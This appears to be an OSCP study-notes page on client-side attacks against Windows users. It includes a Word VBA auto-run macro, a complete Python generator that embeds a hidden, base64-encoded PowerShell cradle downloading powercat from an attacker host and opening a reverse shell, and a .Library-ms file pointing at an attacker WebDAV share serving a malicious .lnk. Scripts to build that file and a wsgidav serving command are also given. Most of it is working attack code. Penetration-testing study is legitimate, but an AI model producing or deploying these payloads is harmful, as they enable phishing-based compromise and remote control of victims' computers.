OSCP Notes
Client Side


Last updated 8 months ago

Exploiting Microsoft Office

Steps to reproduce the document macro attack with a VBA script:

  1. Create a new document in Microsoft Word.

  2. Create a new macro: View > Macros.

  3. Give the macro a name, set "Macros in:" to the current document (not Normal.dotm) and click Create.

  4. Write the macro, replacing <Payload> with the command to execute as a quoted VBA string (for example a PowerShell download cradle). AutoOpen and Document_Open both call MyMacro so the payload runs whichever open event Word fires:

' Word runs AutoOpen when a document containing it is opened
Sub AutoOpen()
    MyMacro
End Sub

' Document_Open is the ThisDocument event handler; both entry points call MyMacro
Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    Str = <Payload>
    ' Launch the payload through the Windows Script Host shell object
    CreateObject("Wscript.Shell").Run Str
End Sub

  5. Save the file as .doc (Word 97-2003) or .docm; the default .docx format cannot store macros. Macros are still disabled by default, so the victim has to click Enable Content before the macro runs.


I've created a Python script which generates the VBA script content with a powercat reverse shell payload, given a local host and port:

python3 vba-powercat-revshell.py <local_host> <local_port>
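As an added example (this is not the script referenced above, which is not reproduced on this page), the generator below does the same job end to end: it builds a PowerShell stager that downloads powercat and connects back, base64-encodes it in UTF-16LE for powershell.exe -enc, and splits the result into short VBA literals because VBA rejects string literals longer than 255 characters. The powercat.ps1 URL, the listener address and the 50-character chunk size are assumptions.

```python
"""Generate a Word VBA macro that launches a powercat reverse shell.

Added example, not the page's own script. Assumes powercat.ps1 is served from
http://<lhost>/powercat.ps1 and that a listener waits on <lhost>:<lport>.
"""
import base64
import sys


def powershell_stager(lhost: str, lport: int) -> str:
    """PowerShell one-liner: fetch powercat into memory and connect back."""
    return (
        "IEX (New-Object System.Net.WebClient)"
        f".DownloadString('http://{lhost}/powercat.ps1');"
        f"powercat -c {lhost} -p {lport} -e powershell"
    )


def encode_powershell(command: str) -> str:
    """Base64 of the UTF-16LE command, the format powershell.exe -enc expects."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


def decode_powershell(encoded: str) -> str:
    """Inverse of encode_powershell, used to verify what the macro will run."""
    return base64.b64decode(encoded).decode("utf-16le")


def chunk(text: str, size: int = 50) -> list[str]:
    """Split text into pieces short enough for one VBA string literal.

    VBA has a 255-character limit for literal strings, so a long base64 blob
    has to be concatenated from shorter pieces (50 is an arbitrary safe size).
    """
    return [text[i:i + size] for i in range(0, len(text), size)]


def build_vba(lhost: str, lport: int) -> str:
    """Return the complete macro text ready to paste into the VBA editor."""
    payload = "powershell.exe -nop -w hidden -enc " + encode_powershell(
        powershell_stager(lhost, lport)
    )
    lines = [
        "Sub AutoOpen()",
        "    MyMacro",
        "End Sub",
        "",
        "Sub Document_Open()",
        "    MyMacro",
        "End Sub",
        "",
        "Sub MyMacro()",
        "    Dim Str As String",
    ]
    # base64 and the fixed prefix contain no double quotes, so no escaping needed
    lines += [f'    Str = Str + "{piece}"' for piece in chunk(payload)]
    lines += [
        '    CreateObject("Wscript.Shell").Run Str',
        "End Sub",
    ]
    return "\n".join(lines) + "\n"


def reassemble(vba: str) -> str:
    """Recover the command from the concatenated literals (self-check)."""
    prefix = 'Str = Str + "'
    parts = []
    for raw in vba.splitlines():
        line = raw.strip()
        if line.startswith(prefix) and line.endswith('"'):
            parts.append(line[len(prefix):-1])
    return "".join(parts)


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit(f"usage: {sys.argv[0]} <lhost> <lport>")
    print(build_vba(sys.argv[1], int(sys.argv[2])), end="")
```

Before sending the document, run `reassemble` on the output and decode the base64: if the decoded stager does not match what you intended, a chunk boundary or quoting problem has mangled it, and the macro would fail silently on the victim.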

Exploiting Windows Library Files

Windows libraries are virtual containers that aggregate a user's content from one or more folders, local or remote. A library is described by a .Library-ms file, which is plain XML.

This attack sends the victim a .Library-ms file whose only location is an attacker-controlled WebDAV share. When the victim opens the file, Explorer shows the share as if it were a local Windows folder. In the second stage the victim double-clicks a malicious .lnk file served from that share.


First, create the .Library-ms file. The <url> element is left empty in the template below and must be filled in with the WebDAV server address before use:

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url></url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
  • <libraryDescription>: This is the root element that defines the overall structure of a Windows library configuration.

  • <name>: Refers to a string identifier for the library.

  • <version>: Specifies the version of the library schema.

  • <isLibraryPinned>: Indicates whether the library is pinned in the user's navigation pane.

  • <iconReference>: Points to the resource for the icon associated with the library.

  • <templateInfo>: Contains metadata about the library's folder type template.

  • <folderType>: Defines the folder type or classification of the library using a GUID, which influences its behavior and appearance. The GUID above is the one used by the built-in Documents library, and it determines the columns and details that appear in Windows Explorer.

  • <searchConnectorDescriptionList>: A wrapper for the collection of search connectors (local or remote locations) that the library includes.

  • <searchConnectorDescription>: Defines individual search connectors, specifying details like save location and support status.

  • <isDefaultSaveLocation>: Indicates whether this search connector is the default location for saving files, set to true here.

  • <isSupported>: Compatibility flag; set to false here so that Explorer still accepts the location.

  • <simpleLocation>: Specifies the search connector’s location in a simplified format.

  • <url>: Points to the URL of the attacker's WebDAV server (for example http://<attacker_ip>). Explorer connects to it when the library is opened.

Serve the directory over WebDAV; it holds the malicious files, such as a .lnk whose target is powershell.exe with a download cradle in its arguments. wsgidav with anonymous authentication is enough:

wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root <directory_to_serve>
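As an added example, not part of the original notes, the script below builds the .Library-ms XML shown above with the WebDAV URL filled in, and also parses an existing .Library-ms to list its locations and flag the ones that leave the host. The URL 192.168.45.5 is a constructed placeholder; the GUID and resource identifiers are the ones from the template above.

```python
"""Build and inspect .Library-ms files that point at a WebDAV share.

Added example (not the page's own code). The WebDAV URL is a constructed
placeholder; wsgidav must actually serve that address for the attack to work.
Requires Python 3.9+ (ET.indent).
"""
import xml.etree.ElementTree as ET

NS = "http://schemas.microsoft.com/windows/2009/library"
# folderType used by the built-in Documents library (from the template above)
DOCUMENTS_TEMPLATE = "{7d49d726-3c21-4f05-99aa-fdc2c9474656}"

# Serialize with a default namespace so the root reads <libraryDescription xmlns="...">
ET.register_namespace("", NS)


def _q(tag: str) -> str:
    """Qualified tag name in the library namespace."""
    return f"{{{NS}}}{tag}"


def build_library_ms(webdav_url: str, name: str = "@windows.storage.dll,-34582") -> str:
    """Return the XML for a library whose single location is webdav_url."""
    root = ET.Element(_q("libraryDescription"))
    ET.SubElement(root, _q("name")).text = name
    ET.SubElement(root, _q("version")).text = "6"
    ET.SubElement(root, _q("isLibraryPinned")).text = "true"
    ET.SubElement(root, _q("iconReference")).text = "imageres.dll,-1003"
    tmpl = ET.SubElement(root, _q("templateInfo"))
    ET.SubElement(tmpl, _q("folderType")).text = DOCUMENTS_TEMPLATE
    lst = ET.SubElement(root, _q("searchConnectorDescriptionList"))
    desc = ET.SubElement(lst, _q("searchConnectorDescription"))
    ET.SubElement(desc, _q("isDefaultSaveLocation")).text = "true"
    ET.SubElement(desc, _q("isSupported")).text = "false"
    loc = ET.SubElement(desc, _q("simpleLocation"))
    ET.SubElement(loc, _q("url")).text = webdav_url
    ET.indent(root)
    body = ET.tostring(root, encoding="unicode")
    return '<?xml version="1.0" encoding="UTF-8"?>\n' + body + "\n"


def library_locations(xml_text: str) -> list[str]:
    """Every <url> inside a .Library-ms; handy when triaging a received file."""
    root = ET.fromstring(xml_text)
    return [(u.text or "").strip() for u in root.iter(_q("url"))]


def is_remote(url: str) -> bool:
    """True for locations that leave the host: http(s) WebDAV or UNC paths."""
    lowered = url.strip().lower()
    return lowered.startswith(("http://", "https://", "\\\\"))


def remote_locations(xml_text: str) -> list[str]:
    """Locations a defender should look at first: anything not on the local disk."""
    return [u for u in library_locations(xml_text) if is_remote(u)]


if __name__ == "__main__":
    import sys
    url = sys.argv[1] if len(sys.argv) > 1 else "http://192.168.45.5/"  # placeholder
    xml = build_library_ms(url)
    print(xml, end="")
    print("remote locations:", remote_locations(xml), file=sys.stderr)
```

Run it with the WebDAV URL as the argument and redirect the output to a file with a .Library-ms extension; the same `remote_locations` check, run over a .Library-ms received by mail, is the quickest way to tell a benign library from one that points off-host.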

References

Windows Libraries - Windows Client Management | Microsoft Learn